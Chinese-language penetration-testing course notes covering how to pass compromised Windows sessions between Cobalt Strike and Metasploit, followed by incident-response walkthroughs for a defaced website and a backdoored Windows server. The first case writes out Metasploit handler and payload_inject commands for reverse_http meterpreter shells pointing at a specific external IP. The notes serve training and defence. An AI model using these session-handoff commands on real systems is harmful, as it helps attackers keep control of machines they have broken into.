思維導圖1-權限維持
- 時間原因,權限維持內容本課不再講解,后期有時間的話會補充。而且權限維持屬於滲透后期的知識,關鍵還是前面的內容,多實踐,多總結。
思維導圖2-應急響應
本課重點:
- 案例1:MSF&CobaltStrike聯動Shell
- 案例2:WEB攻擊應急響應朔源-后門,日志
- 案例3:WIN系統攻擊應急響應朔源-后門,日志,流量
案例1:MSF&CobaltStrike聯動Shell
為什么要進行聯動?因為cs和msf經常相互調用,有一些功能cs強一點,有一些可能msf強一點,所以在滲透測試的時候經常要切換!所以我們需要學習如何在cs、msf、powershell之間進行會話委派。powershell本身用處少,而且很多正式環境上的powershell默認執行策略是關閉的,總的來說有的雞肋,所以這里就不再講了。
CS->MSF 創建Foreign監聽器->MSF監聽模塊設置對應地址端口->CS執行Spawn選擇監聽器 MSF->CS CS創建監聽器->MSF載入新模塊注入設置對應地址端口->執行CS等待上線 use exploit/windows/local/payload_inject
環境准備:2台外網服務器(分別部署msf和cs)和一台webserver服務器、一台本地主機。在webserver和本地主機執行木馬,實現域內主機上線,先將會話從cs移交到msf,再從msf移交到cs,實現互相切換。
案例演示1-cs移交到msf
<1>啟動cs,在在webserver和本地主機執行木馬,實現webserver和本地主機上線。
<2>CS上,創建Foreign監聽器
<3>MSF監聽模塊設置對應地址端口
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http #這個payload要跟CS設置的payload保持一致 set lhost 0.0.0.0 #不設置也行 set lport 4444 #端口需要與cs監聽器端口保持一致 exploit
<4>CS執行Spawn選擇監聽器。具體步驟:右擊本地主機圖標-->spawn(權利委派)-->選擇msf監聽器,如果想要msf接管webserver主機權限,就先右擊webserver主機圖標
<5>等待一會兒,msf接收到會話。如果一直沒有反彈結果,可能就是網絡問題,此時就要看看接管主機類型了(如果是虛擬機,一般沒什么問題。但是阿里雲服務器上面有個端口問題,要開啟4444端口,還可以右鍵session——sleep設1試試)
案例演示2-msf移交到cs
<1>CS創建監聽器
<2>MSF載入新模塊注入設置對應地址端口
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http #這個payload要跟CS監聽器設置的payload保持一致 set lport 5566 #端口需要與cs監聽器端口保持一致 set lhost 101.37.160.211 # IP設置為msf本地IP,與CS設置保持一致 set session 4 #上面第<5>步生成的session就是4 exploit
<3>等待一會兒,會話4的shell就反彈到CS上面了
案例2:WEB攻擊應急響應溯源-后門,日志
故事回顧:某客戶反映自己的網站首頁出現篡改,請求支援 分析:涉及的攻擊面,涉及的操作權限,涉及的攻擊意圖,涉及的攻擊方式等 思路1:利用日志定位修改時間基數,將前時間進行攻擊分析,后時間進行操作分析 思路2:利用后門webshell查殺腳本或工具找到對應后門文件,定位第一次時間分析
站在攻擊者的角度,去分析。攻擊者當前拿到哪些權限,網站還是系統權限。裝沒裝殺軟,用滲透者的思路去想問題。注重信息搜集,從攻擊面入手查看應急響應。
案例演示
<1>執行netstat -ano命令,通過開放的端口找到對應的PID。
<2>執行tasklist -svc命令,通過PID找到對應的進程名稱。
<3>在任務管理器,右擊進程名稱,選擇打開文件位置。
直接定位到具體位置
<4>根據不同的服務名,找尋對應的日志存儲目錄。
<5>打開日志,分析異常操作,發現有人上傳了x.php文件。
<6>通過網站目錄找到x.php
<7>打開看一下,是后門文件。
<8>還可以去網站目錄查看首頁修改時間,查找網站相關日志,定位修改時間基數,將該時間之前的日志進行攻擊分析(分析攻擊者是如何修改首頁內容的),該時間之后的日志進行操作分析(分析攻擊者修改網頁之后還進行了什么操作,是否留有后門等)
<9>利用后門webshell查殺腳本或工具找到對應后門文件,網上有很多查殺工具,比如D盾_Web查殺、百度WEBDIR+、河馬、Sangfor WebShellKill、深度學習模型檢測PHP Webshell、PHP Malware Finder、在線webshell查殺工具等。參考:https://blog.csdn.net/qq_25645753/article/details/110196602
比如使用河馬查殺,安裝之后,掃描,發現兩個后門。然后去日志搜索相關關鍵字,找到是誰訪問了這個后門,如何操作等。
案例3:WIN系統攻擊應急溯源-后門,日志,流量
分析:涉及的攻擊面,涉及的操作權限,涉及的攻擊意圖,涉及的攻擊方式等 故事回顧:某客戶反映服務器出現卡頓等情況,請求支援 思路:利用監控工具分析可疑進程,利用殺毒軟件分析可疑文件,利用接口工具抓流量 獲取進監控:PCHunter64 獲取執行列表:UserAssistView UserAssistView下載:https://www.onlinedown.net/soft/628964.htm AppCompatCacheParser.exe --csv c:\temp -t
案例演示
<1>打開PCHunter64工具,查看正在運行的進程,發現異常進程artifact.exe(名字不熟悉,沒有廠商信息等)
<2>在網絡模塊,發現該進程與外部IP地址進行網絡連接,很可疑。
<3>PCHunter64工具還有很多其他功能,可以進一步分析該進程是否是后門或者勒索病毒等。
<4>UserAssistView工具可以看到windows系統所有文件的執行時間記錄,比如我們可以查看一下artifact.exe上次修改的時間。說明在這個時間點前后攻擊者一定對系統進行了一些操作,相應地,我們就可以以此時間為基數,定位查找日志將該時間之前的日志進行攻擊分析(分析攻擊者是如何攻擊服務器的),該時間之后的日志進行操作分析(分析攻擊者登錄服務器后進行了什么操作)
